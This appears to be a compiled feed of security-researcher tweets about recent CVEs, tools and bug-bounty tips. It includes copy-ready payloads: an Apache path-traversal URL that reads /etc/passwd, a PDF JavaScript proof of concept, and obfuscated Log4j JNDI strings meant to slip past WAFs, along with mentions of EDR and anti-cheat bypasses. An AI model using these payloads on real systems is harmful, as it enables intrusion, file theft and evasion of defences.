Life of a vulnerability reaearcher

CVE-2021-33035: RCE in Apache OpenOffice up to 4.1.10 - pure memory corruption. Just talked about it at #hacktivitycon and full writeup at medium.com/csg-govtech/al…. More to come on CVE-2021-38646 Microsoft Office RCE...

revised ;(

A little #WinDbg cheat sheet, might be helpful. Check the github repo for the mindmap file. github.com/N1ght-W0lf/Win…

CVE-2021-41773 POC 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

I have summarized the Apache path normalization clusterfuck for you

這遊戲簡直就是 nand2teris 的遊戲化版本，超級自虐又超級好玩。 從 NAND 邏輯閘、暫存器、記憶體、多工解多工、ALU、instruction decode，最後終於達到 Turing Complete。剛組好電路還不能寫 assembly，遊戲硬是要逼你用機器語言寫一次。遊戲可以讓你自訂指令名稱，創造你自己的組合語言。

#bugbountytip #BugBounty Multiple RCE Wordpress $300,000 1. Design Flaws 2. SQL Injection 3. The Traditional Path to RCE More..bit.ly/3FGGim1

CVE-2021-41780 Proof of Concept: %PDF 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj <</S /JavaScript /JS ( var a = this.addAnnot({type: "Text"}); a.destroy(); a.transitionToState(); )>> trailer <</Root 1 0 R>>

The Hardware Hacking Handbook final version by Jasper van Woudenberg and Colin O'Flynn is finally out! 🥳 nostarch.com/hardwarehacking

Did you know that your Interactsh server may also be used to query cloud metadata services? Reference - github.com/projectdiscove… #ssrf #apache #appsec #bugbounty #pentest

CVE-2021-40438 Apache mod_proxy SSRF via uri-path httpd.apache.org/security/vulne… demo: github.com/CHYbeta/OddPro… analysis: 1、firzen.de/building-a-poc… 2、articles.zsxq.com/id_8fvzqudhj1f… （chinese）

First confirmed entry for day1 of TianfuCup, Kunlun Lab SorryMybad pwned Google Chrome to get Windows system kernel level privilege with only two bugs. First time since 2015 as I remembered

How to bypass EAC

ADenum - A Pentesting Tool That Allows To Find Misconfiguration Through The The Protocol LDAP And Exploit Some Of Those Weaknesses With Kerberos ift.tt/3yiro23 #cybersecurity #bugbountytips #hacking #tools

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :

I don't do memes, but this one is the best I've seen so far

#Nginx 1.18 exploit in the wild! #infosec #0day #exploit Catalin Cimpanu

Bypassing CrowdStrike, Microsoft Defender for Endpoint etc. for fun.. not profit vanmieghem.io/blueprint-for-…

Unsafe .Net Deserialization in Windows Event Viewer! This is a by-product of my research. Has confirmed with MSRC that this didn't cross any security boundary, but I guess it could still be another fun #LOLbas or Defender Bypass.😆